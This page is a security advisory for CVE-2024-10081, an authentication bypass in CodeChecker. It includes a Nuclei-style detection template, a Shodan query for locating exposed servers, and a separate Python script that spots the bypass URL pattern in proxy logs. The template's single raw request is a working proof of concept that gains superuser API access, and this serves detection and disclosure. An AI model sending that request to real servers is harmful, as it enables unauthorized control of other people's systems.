Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
PoC code [publicly released]
id: CVE-2024-10081
info:
  name: CodeChecker <= 6.24.1 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
  impact: |
    Unauthenticated attackers can bypass authentication by crafting API URLs ending with specific keywords, gaining superuser access to all API endpoints including product management and configuration.
  remediation: |
    Upgrade CodeChecker to version 6.24.2 or later.
  reference:
    - https://github.com/advisories/GHSA-f3f8-vx3w-hp5q
    - https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10081
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 10
    cve-id: CVE-2024-10081
    cwe-id: CWE-288
    epss-score: 0.65481
    epss-percentile: 0.98438
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1496590341
  tags: cve,cve2024,code-checker,auth-bypass,vkev,vuln
http:
  - raw:
      - |
        POST /v6.58/Products/Authentication HTTP/1.1
        Host: {{Hostname}}

        [1,"getProducts",1,1,{}]
    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"{\"0\":{\"lst\":[\"rec\",")'
          - "!contains(body,'Error code 401: Unauthorized')"
          - "contains(header,'application/x-thrift')"
        condition: and
# digest: 4b0a00483046022100a13495cdae20082cb7c28bc50392719a1a3d37425bdc1dd26929a9d5066a58a40221009573262cdda294fde87c548c983f033a88d6478fefc887248c6165a5b918b226:922c64590222798bb761d5b6d8e72950
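A log check for the URL shape described above, as an added example that is not part of the original page or the CodeChecker project: it flags requests whose path ends in one of the three keywords but is not the bare `/v<version>/<Keyword>` service URL. It assumes a reverse proxy in front of CodeChecker writing combined-format access logs and that legitimate calls to these three services use that bare form; the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Keywords from the advisory: a URL ending in one of these skips the auth check.
BYPASS_SUFFIXES = ("Authentication", "Configuration", "ServerInfo")

# Assumption: a legitimate call to these services is exactly /v<major>.<minor>/<Keyword>.
LEGIT_PATH = re.compile(r"/v\d+\.\d+/(?:%s)" % "|".join(BYPASS_SUFFIXES))

# Client IP, request line and status from a combined-format access log line.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.10 - - [12/Nov/2024:10:00:01 +0000] "POST /v6.58/Authentication HTTP/1.1" 200 310 "-" "CodeChecker"',
    '203.0.113.7 - - [12/Nov/2024:10:01:02 +0000] "POST /v6.58/Products/Authentication HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.10 - - [12/Nov/2024:10:01:40 +0000] "POST /Default/v6.58/CodeCheckerService HTTP/1.1" 200 2048 "-" "CodeChecker"',
    '203.0.113.7 - - [12/Nov/2024:10:02:15 +0000] "POST /v6.58/Products/ServerInfo HTTP/1.1" 401 57 "-" "-"',
    '198.51.100.11 - - [12/Nov/2024:10:03:00 +0000] "POST /v6.58/Products HTTP/1.1" 401 57 "-" "-"',
]


def suspicious_requests(lines):
    """Return (ip, path, status) for requests matching the bypass URL shape."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        # Compare on the decoded path only; ignore any query string.
        path = unquote(m["target"].split("?", 1)[0])
        # Keyword at the end of the path, but not the bare service URL itself.
        if path.endswith(BYPASS_SUFFIXES) and not LEGIT_PATH.fullmatch(path):
            hits.append((m["ip"], path, int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, path, status in suspicious_requests(SAMPLE_LOG):
        # 200: the request was served; anything else: it was not.
        verdict = "served" if status == 200 else "not served"
        print(f"{ip} {path} -> {status} ({verdict})")
```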